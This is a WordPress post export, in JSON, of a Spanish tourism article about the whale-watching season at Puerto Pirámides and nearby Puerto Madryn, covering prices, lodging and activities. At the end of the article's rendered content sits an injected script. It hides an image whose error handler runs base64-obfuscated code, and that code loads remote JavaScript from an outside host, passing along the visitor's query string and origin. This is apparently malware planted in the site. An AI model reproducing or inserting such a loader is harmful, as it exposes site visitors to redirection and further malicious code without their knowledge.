{"id":5435,"date":"2022-06-27T09:10:40","date_gmt":"2022-06-27T12:10:40","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5435"},"modified":"2025-08-13T16:18:00","modified_gmt":"2025-08-13T19:18:00","slug":"comenzo-la-temporada-de-avistamiento-de-ballenas-en-puerto-piramides","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5435","title":{"rendered":"Comenz\u00f3 la temporada de avistamiento de ballenas en Puerto Pir\u00e1mides"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg\" alt=\"\" class=\"wp-image-5399\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_27-5-2022_185555_www.termatalia.com_.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#033451\">\u00abAc\u00e1 estamos para darle la bienvenida a los amigos que visiten la capital nacional de la ballena franca austral\u00bb, dijo entusiasmado en di\u00e1logo con T\u00e9lam Fabi\u00e1n Gand\u00f3n, el intendente de esa peque\u00f1a localidad.<\/h4>\n\n\n\n<p>La temporada de ballenas comenz\u00f3 en Puerto Pir\u00e1mides, la \u00fanica localidad ubicada sobre Pen\u00ednsula Vald\u00e9s en el extremo noreste del Chubut, desde donde&nbsp;<strong>operan las seis empresas que realizan el servicio de avistamiento a bordo de embarcaciones.<\/strong><\/p>\n\n\n\n<p>\u00abAc\u00e1 estamos para darle la bienvenida a los amigos que visiten la capital nacional de la ballena franca austral\u00bb, dijo entusiasmado en di\u00e1logo con T\u00e9lam Fabi\u00e1n Gand\u00f3n, el intendente de esa<strong>&nbsp;peque\u00f1a localidad, de poco m\u00e1s de 600 habitantes, recostada sobre el golfo nuevo, en la base de Pen\u00ednsula Vald\u00e9s.<\/strong><\/p>\n\n\n\n<p>Gand\u00f3n espera que \u00absea esta una buena temporada para dejar atr\u00e1s los tiempos de pandemia en los que realmente los prestadores la pasaron feo porque el turismo se paraliz\u00f3 y nuestra comunidad vive de la actividad tur\u00edstica\u00bb.<\/p>\n\n\n\n<p>Puerto Pir\u00e1mides est\u00e1 ubicada al sudeste de la pen\u00ednsula que fue&nbsp;<strong>declarada patrimonio natural de la humanidad por la Unesco en 1999.<\/strong><\/p>\n\n\n\n<p>Se trata de una formaci\u00f3n de 3.600 km2 que se dibuja en los mapas como un \u00abhongo\u00bb que se introduce en el mar, unida al continente por el istmo Carlos Ameghino.<\/p>\n\n\n\n<p>Desde Puerto Pir\u00e1mides operan seis<strong>&nbsp;empresas de avistamiento.&nbsp;<\/strong>\u00ab<strong>Los precios son de $8.400 para adultos, la mitad para menores de entre 4 y 12 a\u00f1os y sin cargo para menores de 4&#8243;,<\/strong>&nbsp;explic\u00f3 en di\u00e1logo con T\u00e9lam<strong>&nbsp;Marcela Fern\u00e1ndez, directora de turismo de Puerto Pir\u00e1mides.<\/strong><\/p>\n\n\n\n<p>La funcionaria aclar\u00f3 que solo hay una empresa que tiene una tarifa mayor porque posee una embarcaci\u00f3n que tiene la particularidad de contar con \u00abventanas\u00bb en la parte inferior del casco, lo que permite observar desde abajo a las ballenas nadando.<\/p>\n\n\n\n<p><strong>Los precios se mantendr\u00e1n hasta el 1 de agosto<\/strong>, cuando da comienzo la&nbsp;<strong>temporada alta<\/strong>, donde esos valores se duplicar\u00e1n hasta el fin de a\u00f1o.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2022\/06\/62b7315d5a908_900.jpg\" alt=\"\" \/><figcaption><br>\/\/foto maxi jonas<\/figcaption><\/figure>\n\n\n\n<p><strong>Las excursiones n\u00e1uticas<\/strong>&nbsp;se extienden una hora y media aproximadamente siempre que las condiciones del mar y la visibilidad lo permitan, en compa\u00f1\u00eda de gu\u00edas de naturaleza con vasto conocimiento en la materia.<\/p>\n\n\n\n<p><strong>Puerto Pir\u00e1mides cuenta con 830 camas para alojar a turistas&nbsp;<\/strong>que van desde hospedajes domiciliarios hasta hoteles boutique, con precios que oscilan entre los $3.500 por persona y por d\u00eda (promediando los valores de departamentos), a m\u00e1s de $15.000 en los hoteles de categor\u00eda.<\/p>\n\n\n\n<p>\u00abEse es un c\u00e1lculo que hacemos porque los hoteles reci\u00e9n est\u00e1n abriendo y el tarifario se ir\u00e1 conociendo en los pr\u00f3ximos d\u00edas\u00bb aclar\u00f3 la directora de turismo de Pir\u00e1mides.<\/p>\n\n\n\n<p>Adem\u00e1s del avistamiento de ballenas, desde Puerto Pir\u00e1mides se realizan otras<strong>&nbsp;actividades como traves\u00edas en kayak, mountain bike, trekking por senderos naturales e hist\u00f3ricos, buceo, snorkeling con lobos marinos y jornadas de picnic en Cerro Olazabal.<\/strong><\/p>\n\n\n\n<p>\u00abTambi\u00e9n est\u00e1 pr\u00f3xima la lober\u00eda y desde nuestra localidad se puede recorrer en un par de horas el contorno de la Pen\u00ednsula Vald\u00e9s, Punta Norte, la zona de Caleta Vald\u00e9s, donde se observan cada tanto ejemplares de orcas hasta Punta Delgada, desde donde se puede ver Punta Ninfas, la otra punta que forma la boca del golfo nuevo\u00bb detall\u00f3 Fern\u00e1ndez.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2022\/06\/62b7315d83e59_900.jpg\" alt=\"\" \/><\/figure>\n\n\n\n<p>Puerto Pir\u00e1mides est\u00e1 ubicado a 95 km. de Puerto Madryn, la ciudad cabecera de la comarca, con 7.000 camas hoteleras disponibles para los turistas y sede de las principales agencias de viajes dedicadas al turismo receptivo sobre todo de extranjeros que llegan al muelle de aguas profundas \u00abLuis Piedrabuena\u00bb durante la temporada de cruceros.<\/p>\n\n\n\n<p><strong>En Puerto Madryn tambi\u00e9n se puede hacer avistamiento de ballenas pero desde la costa,<\/strong>&nbsp;sin necesidad de embarcarse y de manera gratuita, en la zona conocida como \u00abEl Doradillo\u00bb, espacio costero de fina arena declarada \u00ab\u00c1rea Natural Protegida\u00bb, ubicado a 18 kil\u00f3metros del centro de la ciudad.<\/p>\n\n\n\n<p>En ese lugar se suelen ver a las hembras en proceso de parto, amamantando a sus cr\u00edas o \u00abregalando\u00bb al observador el espect\u00e1culo de las madres ense\u00f1ando a los ballenatos a desenvolverse en el entorno.<\/p>\n\n\n\n<p>Desde la ciudad se pueden divisar a las ballenas exhibiendo sus lomos, las colas o saltando en las aguas del Golfo Nuevo mientras se disfruta de un almuerzo en los paradores que est\u00e1n frente al mar.<\/p>\n\n\n\n<p><strong>La gastronom\u00eda&nbsp;<\/strong>de Puerto Madryn es reconocida por los paladares exigentes, sobre todo por los platos t\u00edpicos a base de pescados y mariscos o el aclamado cordero patag\u00f3nico en sus variantes, guisado o \u00aba la estaca\u00bb como es costumbre en la regi\u00f3n.<\/p>\n\n\n\n<p>Vieiras, langostinos, navajas, salm\u00f3n blanco, son algunos de los productos locales que se destacan, junto a la reposter\u00eda tradicional con \u00abLa torta galesa\u00bb como emblema, entre chocolates con forma de colitas de ballena para souvenir o alfajores, que se consiguen en los delikatessen y negocios c\u00e9ntricos.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202206\/596588-temporada-avistamiento-ballenas-puerto-piramides-chubut.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1.jpeg\" alt=\"\" class=\"wp-image-5235\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1.jpeg 964w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-300x30.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-768x76.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-1-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u00abAc\u00e1 estamos para darle la bienvenida a los amigos que visiten la capital nacional de la ballena franca austral\u00bb, dijo entusiasmado en di\u00e1logo con T\u00e9lam Fabi\u00e1n Gand\u00f3n, el intendente de esa peque\u00f1a localidad. La temporada de ballenas comenz\u00f3 en Puerto Pir\u00e1mides, la \u00fanica localidad ubicada sobre Pen\u00ednsula Vald\u00e9s en el extremo noreste del Chubut, desde [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5436,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21,22],"tags":[],"class_list":["post-5435","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-patagonia","category-turismo-sostenible"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5435","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5435"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5435\/revisions"}],"predecessor-version":[{"id":10647,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5435\/revisions\/10647"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5436"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5435"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5435"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5435"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}